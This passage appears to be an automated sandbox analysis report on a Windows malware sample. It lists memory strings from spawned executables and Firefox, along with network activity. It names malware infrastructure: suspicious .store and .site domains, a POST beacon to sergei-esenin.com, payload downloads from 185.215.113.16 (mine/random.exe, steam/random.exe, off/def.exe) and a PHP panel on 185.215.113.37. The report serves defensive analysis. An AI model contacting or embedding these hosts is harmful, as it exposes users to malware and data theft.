Source: firefox.exe, 0000001D.00000002.2175868045.000001C968391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2175868045.000001C968391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: captcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: color-mix(in srgb, currentColor 9%, transparent)*://*.adsafeprotected.com/*/imp/**://www.facebook.com/platform/impression.php*color-mix(in srgb, currentColor 9%, transparent)*://ads.stickyadstv.com/user-matching*--autocomplete-popup-separator-color--panel-banner-item-update-supported-bgcolor*://vast.adsafeprotected.com/vast*extensions.geckoProfiler.acceptedExtensionIds equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: devtools.debugger.remote-websocketJSON Viewer's onSave failed in startPersistence{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}WebChannel/this._originCheckCallback^([a-z+.-]+:\/{0,3})*([^\/@]+@).+browser.urlbar.dnsResolveFullyQualifiedNamesresource://devtools/server/devtools-server.jsFailed to execute WebChannel callback:^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)Failed to listen. Callback argument missing.^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools.performance.recording.ui-base-urlbrowser.fixup.domainsuffixwhitelist.Got invalid request to save JSON dataDevTools telemetry entry point failed: devtools/client/framework/devtools-browserNo callback set for this channel.@mozilla.org/network/protocol;1?name=file@mozilla.org/network/protocol;1?name=defaultreleaseDistinctSystemPrincipalLoader@mozilla.org/dom/slow-script-debug;1@mozilla.org/uriloader/handler-service;1^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?resource://devtools/shared/security/socket.jsUnable to start devtools server on resource://gre/modules/JSONFile.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjsget FIXUP_FLAG_FORCE_ALTERNATE_URI{33d75835-722f-42c0-89cc-44f328e56a86}_injectDefaultProtocolHandlersIfNeededhttp://www.inbox.lv/rfc2368/?value=%sCan't invoke URIFixup in the content processresource://gre/modules/DeferredTask.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}@mozilla.org/network/file-input-stream;1_finalizeInternal/this._finalizePromise<https://mail.inbox.lv/compose?to=%shttps://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/NetUtil.sys.mjsgecko.handlerService.defaultHandlersVersionhttp://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/JSONFile.sys.mjsisDownloadsImprovementsAlreadyMigratedhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s@mozilla.org/uriloader/local-handler-app;1handlerSvc fillHandlerInfo: don't know this typeextractScheme/fixupChangedProtocol<https://e.mail.ru/cgi-bin/sentmsg?mailto=%sScheme should be either http or httpshttp://win.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/dbus-handler-app;1https://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/FileUtils.sys.mjsextension/default-theme@mozilla.org/extendedDataMust have a source and a callbacknewChannel requires a single object argumentFirst argument should be an nsIInputStream@mozilla.org/intl/converter-input-stream;1@mozilla.org/network/simple-stream-listener;1@mozilla.org/network/input-stream-pump;1Non-zero amount of bytes must be specified@mozilla.org/scriptableinputstream;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%s@mozilla.org/uriloader/handler-service;1pdfjs.previousHandler.alwaysAskBeforeHandlingVALIDATE_DONT_COLLAPSE_WHITESPACE@mozilla.org/network/async-stream-copier;1https://mail.yandex.ru/compose?mailto=%s@mozilla.org/uriloader/handler-service;1https://mail.yahoo.co.jp/compose/?To=%sSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_I
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2303891585.000001C96F71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2300171636.000001C96F503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService:selectUpdate - the user requires elevation to install this update, but the user has exceeded the max number of elevation attempts. equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService:selectUpdate - the user requires elevation to install this update, but the user has exceeded the max number of elevation attempts. equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2310925330.000001C971677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2310925330.000001C971677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2310925330.000001C971677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2229257788.000001C968F3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C9679EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C9677D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2168882791.000001C9679BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2229257788.000001C968F51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: time.windows.com
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 02:01:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3eIXbYTzSaB2uXFN0BtywBrDeWnsIGEy2pY%2BobjLpaP797zsVktQ8pAs77PN0wCFMh6olsJ9MNmSMFN%2FeCy9ow%2Bjh03zh6wd2LXRyVk4%2BkS8B8rA0r5IR%2B2eYf7m1UBcrVoIlg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d76611cb9896b58-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 02:02:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NPkIdRZfR8lNN0yv1PzvOgVFwG3MMNjzUF9iYEr3hSP3Pgkz%2BqUXmzZEvJKxWhZHgo5clr1CLqtR%2Fcp5n4pCIGSnSplZy5NiTMN%2BDwydkCzN1cp5YNVzoTXL4wCKIeAjW2UkGA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d76627e7de52c94-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 02:03:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XLXbOUuPMLq5zYLgDqaAVE7jzyMmHZVzXav25xHBVgO8Kk7TXj4cnqIDbQA3LX21cSdcSV2h5S4N3KSqDODakx5Prgz%2B4mJvShJP5dOdWDWxhgGm6W1ANtbLAzozn0QiuJ06bQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d76635bfc1a2d3f-DFW
Source: firefox.exe, 0000001D.00000002.2122168164.000001C95726D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2267577999.000001C96ACA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2150615780.000001C966D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573396537.000000000598E000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/F
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/O
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/P
Source: file.exe, file.exe, 00000000.00000003.1573333349.0000000001204000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180894014.00000000059AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe7Q$
Source: 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeD
Source: file.exe, 00000000.00000003.1573333349.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exed
Source: file.exe, 00000000.00000003.1573333349.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeq
Source: file.exe, file.exe, 00000000.00000003.1573333349.0000000001204000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exea
Source: file.exe, file.exe, 00000000.00000003.1573333349.0000000001204000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe2
Source: 8138ba21a1.exe, 00000012.00000003.2181105344.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/mine/random.exeages
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000111E000.00000004.00000020.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000117A000.00000004.00000020.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/c4
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
